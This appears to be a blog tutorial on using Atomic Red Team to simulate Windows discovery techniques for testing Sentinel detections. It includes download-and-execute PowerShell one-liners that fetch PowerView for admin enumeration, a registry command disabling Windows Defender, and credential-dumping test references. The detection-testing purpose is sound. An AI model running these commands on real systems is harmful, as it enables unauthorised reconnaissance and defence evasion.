Simulate Discovery Techniques on Windows via Atomic Red
Hi Medium! Here we are again with a new article related to Sentinel, we will simulate different attacks and we will show you how we can detect them in the next articles that will come.
This article
We will show how we can test our SOC and the capabilities to detect different attacks, or also to build robust rules, we know that now we can import millions of rules but no promise that all of them works and we need to test them one by one to validate what rules are valid for our network and what not.
Atomic red is one of the best tools to run those tests, we will go through all parts needed to simulate different techniques listed in MITRE ATT&CK and try to detect them later on our Sentinel one by one.
This article will cover the following:
Install Atomic Red
- Import-Module
- Show test available for a given technique
- Check if prerequisites are available
- Completely disable Windows Defender
Executed technique on Discovery
- Account Discovery
- Application Window Discovery
- Browser Bookmark Discovery
- Domain Trust Discovery
- File and Directory Discovery
- Group Policy Discovery
- Network Service Scanning
- Network Share Discovery
- Network Sniffing
- Password Policy Discovery
- Peripheral Device Discovery
- Permission Groups Discovery
- Process Discovery
Conclusion
Install Atomic red
The installation is not that hard, you need a PowerShell core and a keyboard. To ease the process make sure to run it on Windows, we will go through the installation together no worries 😊
You can follow this link step by step and you will have the tool installed within a few minutes, one of the things to consider is to use that tool on your victim machine, so you have basically two options:
- Install it and use it on the victim's machine
- Install it on your machine and execute it on another machine by opening a session on the machine you want to test.
To Start
The Atomics Folder contains the test definitions; and the commands that the execution framework will execute. If you would like to install the atomics folder at the same time that you install the execution framework, you can do this by adding the -getAtomics switch during the installation of the execution framework:
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
Install-AtomicRedTeam -getAtomicsBooM we are done, let apply some changes to have a smooth use of the tool.
Import-Module
We don’t want to import the modules each time we open PowerShell so we create a profile:
PS> notepad $profileAnd we add those lines into the file:
Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force
$PSDefaultParameterValues = @{"Invoke-AtomicTest:PathToAtomicsFolder"="C:\AtomicRedTeam\atomics"}Then we can import the profile if needed, usually it will be imported by default:
PS> . $profileShow test available for a given technique
Let’s test some commands to make sure that we are on the right track and we are missing nothing, also those commands will help you understand what you are running, if you face any issues please reach out to the Git page of the tool for further debugging.
Show brief details about a technique:
PS> Invoke-AtomicTest T1003 -ShowDetailsBriefShow brief details about all techniques:
PS> Invoke-AtomicTest All -ShowDetailsBriefShow details about a technique:
PS> Invoke-AtomicTest T1003 -ShowDetailsCheck if prerequisites are available
For each technique, you will execute basically you will be calling a folder in the atomic red that will run multiple commands, and sometimes those commands need prerequisites that you need to install, I advise you to have a look at this folder and the MiTRE Technique to understand what you are running.
Check if we can run the technique on the machine:
PS> Invoke-AtomicTest T1003 -TestName "Windows Credential Editor" -CheckPrereqsPS> Invoke-AtomicTest T1003 -CheckPrereqsSatisfy the prerequisites:
PS> Invoke-AtomicTest T1003 -TestName "Windows Credential Editor" -GetPrereqs
PS> Invoke-AtomicTest T1003 -GetPrereqsExecute all attacks for a given technique, you can run one by one or all of them, that depends of course on your needs:
PS> Invoke-AtomicTest T1218Completely disable Windows Defender
Emmmm hahaha 😆, I don’t know what to say, but disabling this dude is sometimes needed, please use this carefully 😅
PS> New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -ForceExecuted technique on Discovery
I used this link to check the available techniques, have a look, I promise it’s needed.
Some techniques are not represented in atomic red, so you need to check the technique on MiTRE and simulate it manually.
In the list below I will go through all the commands and techniques I needed to run discovery on my machine, for each technique I review it in MiTRE ATT&CK, and I will be attaching the links for the first techniques.
Account Discovery
PS> Invoke-AtomicTest T1087.001
PS> Invoke-AtomicTest T1087.002https://attack.mitre.org/techniques/T1087/
Application Window Discovery
PS> Invoke-AtomicTest T1010https://attack.mitre.org/techniques/T1010/
Browser Bookmark Discovery
PS> Invoke-AtomicTest T1217Domain Trust Discovery
PS> Invoke-AtomicTest T1482File and Directory Discovery
PS> Invoke-AtomicTest T1083Group Policy Discovery
T1615 (Not Found) use command like gpresult, Get-DomainGPO and Get-DomainGPOLocalGroup
Resources: https://attack.mitre.org/techniques/T1615/
Network Service Scanning
Install Nmap and Python, use those scanning tools manually using different parameters to see the difference, and try to catch those scanning in your network logs, you can also use that command but you still need to install Python and Nmap for the prerequisites of this command:
PS> Invoke-AtomicTest T1046Network Share Discovery
PS> Invoke-AtomicTest T1135Network Sniffing
PS> Invoke-AtomicTest T1040Password Policy Discovery
PS> Invoke-AtomicTest T1201Peripheral Device Discovery
PS> Invoke-AtomicTest T1120Permission Groups Discovery
PS> Invoke-AtomicTest T1069.001
PS> Invoke-AtomicTest T1069.002For the following group discovery, you may need to run those commands:
T1069.002–4
PS> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS> IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -VerboseT1069.002–5
PS> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS> IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -VerboseT1069.002–6
PS> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS> IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"Process Discovery
T1424 (Not Found), you can simply use the ps command or others that you may prefer.
Resources: https://attack.mitre.org/techniques/T1424/
Conclusion
All those commands will help you run different discovery techniques and try to catch them on logs and on your alerts, but you need to take into consideration that attackers always try to
